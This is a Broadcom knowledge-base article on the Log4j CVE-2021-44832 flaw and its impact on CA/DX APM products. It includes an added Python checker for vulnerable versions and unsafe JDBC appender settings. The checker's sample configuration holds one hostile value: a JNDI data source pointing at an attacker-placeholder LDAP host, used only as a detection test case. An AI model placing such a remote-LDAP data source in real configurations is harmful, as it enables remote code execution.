CVE-2021-44832 - LOG4J VULNERABILITY AND BROADCOM CA APM

Article ID: 233619


Issue/Introduction

Products Affected:

  • APM
  • DX Application Performance Management
  • DX SaaS
  • CA Application Performance Management (APM / Wily / Introscope)
  • CA Application Performance Management Agent (APM / Wily / Introscope)
  • DX APM SaaS

Description:

CVE-2021-44832

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44832

Apache Log4j2 versions 2.0-beta7 through 2.17.0 (excluding the security fix releases 2.3.2 and 2.12.4) are vulnerable to a remote code execution (RCE) attack when a configuration uses a JDBC Appender with a JNDI LDAP data source URI and the attacker controls the target LDAP server. This issue is fixed by limiting JNDI data source names to the java protocol in Log4j2 versions 2.17.1, 2.12.4, and 2.3.2. Note that exploitation requires the attacker to already be able to modify the Log4j configuration used by the application, so this issue is rated Moderate by Apache (NVD CVSS 3.1 base score 6.6) and is far less severe than the original CVE-2021-44228 JNDI lookup issue.
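As an added illustration (not part of this Broadcom article, and not Broadcom's or Apache's code), the following Python encodes the two facts in the description above: the affected log4j-core version range, and the 2.17.1 restriction that a JDBC appender's JNDI data-source name may only use the java: protocol. It can be pointed at the log4j2.xml files and log4j-core jar versions found in an installation to confirm neither condition is present. The log4j2.xml snippet embedded below is constructed for the example; the appender names and the ldap:// host are placeholders.

```python
import re
import xml.etree.ElementTree as ET

# Releases below 2.17.1 that carry the backported fix (from the advisory text).
FIXED_BACKPORTS = {(3, 2), (12, 4)}
FIRST_VULNERABLE_BETA = 7  # the range starts at 2.0-beta7

_VERSION_RE = re.compile(r"^(\d+)\.(\d+)(?:\.(\d+))?(?:-([A-Za-z]+)(\d*))?$")
_SCHEME_RE = re.compile(r"^([A-Za-z][A-Za-z0-9+.\-]*):")


def is_vulnerable_version(version: str) -> bool:
    """True if a log4j-core version lies in the CVE-2021-44832 range
    2.0-beta7 .. 2.17.0, excluding the fixed releases 2.3.2 and 2.12.4."""
    m = _VERSION_RE.match(version.strip())
    if not m:
        raise ValueError(f"unrecognised version string: {version!r}")
    major, minor = int(m.group(1)), int(m.group(2))
    patch = int(m.group(3) or 0)
    qualifier, qual_num = (m.group(4) or "").lower(), m.group(5)
    if major != 2:
        return False                      # only the 2.x line is in scope here
    if (minor, patch) > (17, 0):
        return False                      # 2.17.1 and later carry the fix
    if (minor, patch) in FIXED_BACKPORTS:
        return False
    if (minor, patch) == (0, 0) and qualifier:
        # Pre-release 2.0 builds: alphas predate the affected range,
        # betas are affected from beta7 onward, release candidates are affected.
        if qualifier == "alpha":
            return False
        if qualifier == "beta":
            return int(qual_num or 0) >= FIRST_VULNERABLE_BETA
    return True


def find_unsafe_jdbc_datasources(config_xml: str) -> list:
    """Return (appender name, jndiName) pairs for JDBC appenders whose DataSource
    names a JNDI URI with a protocol other than java:, i.e. exactly the lookups
    that 2.17.1 refuses. Relative names without a scheme are left alone, which
    is also how the 2.17.1 check treats them."""
    root = ET.fromstring(config_xml)
    findings = []
    for elem in root.iter():
        # Log4j accepts either <JDBC ...> or <Appender type="JDBC" ...>.
        is_jdbc = elem.tag == "JDBC" or elem.get("type", "").upper() == "JDBC"
        if not is_jdbc:
            continue
        for ds in elem.iter("DataSource"):
            jndi_name = ds.get("jndiName", "")
            scheme = _SCHEME_RE.match(jndi_name)
            if scheme and scheme.group(1).lower() != "java":
                findings.append((elem.get("name", "<unnamed>"), jndi_name))
    return findings


# Constructed sample configuration: one appender points its data source at an
# attacker-controlled LDAP server (placeholder host), one uses a local java: name.
SAMPLE_CONFIG = """<?xml version="1.0" encoding="UTF-8"?>
<Configuration status="WARN">
  <Appenders>
    <JDBC name="db" tableName="app_log">
      <DataSource jndiName="ldap://attacker.example/x" />
      <Column name="message" pattern="%m" />
    </JDBC>
    <JDBC name="safe" tableName="app_log">
      <DataSource jndiName="java:comp/env/jdbc/LoggingDS" />
      <Column name="message" pattern="%m" />
    </JDBC>
  </Appenders>
  <Loggers>
    <Root level="info"><AppenderRef ref="safe" /></Root>
  </Loggers>
</Configuration>
"""

if __name__ == "__main__":
    for v in ("2.0-beta7", "2.12.4", "2.17.0", "2.17.1"):
        print(f"log4j-core {v}: {'VULNERABLE' if is_vulnerable_version(v) else 'ok'}")
    for appender, name in find_unsafe_jdbc_datasources(SAMPLE_CONFIG):
        print(f"JDBC appender {appender!r} uses non-java: JNDI data source {name!r}")
```

Run against a real deployment, the version check should be applied to every log4j-core jar found (including copies bundled inside agent and server distributions), and the configuration check to every log4j2 configuration the JVM can load; a clean result on both is what the Broadcom statement below amounts to for the APM components listed there.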

Environment

  • APM SaaS and APM on Premise 
  • APM 9.7, 10.0, 10.1, 10.2, 10.3, 10.5, 10.6, 10.7.x, 11.x and 20.x/21.x

Resolution

Broadcom Engineering has confirmed that the following components are not vulnerable to CVE-2021-44832:

  • APM 9.7 through APM 10.7.x servers (Collectors, MOMs, TESS, TIM, WebView)
  • APM 11.x, SaaS, 20.2 and 21.x Cloud Proxy
  • APM 9.7 through 10.6, 10.7, 11.x, SaaS, 20.2 and 21.x Java-based agents (e.g. WebLogic, WebSphere, Tomcat, EPAgent, UMA, ...)

Engineering analysis is continuing, and any additional information will be provided on the Broadcom support portal via KB articles and updates to this published notification.

Should you have any further questions or concerns, please open a case with Broadcom Support.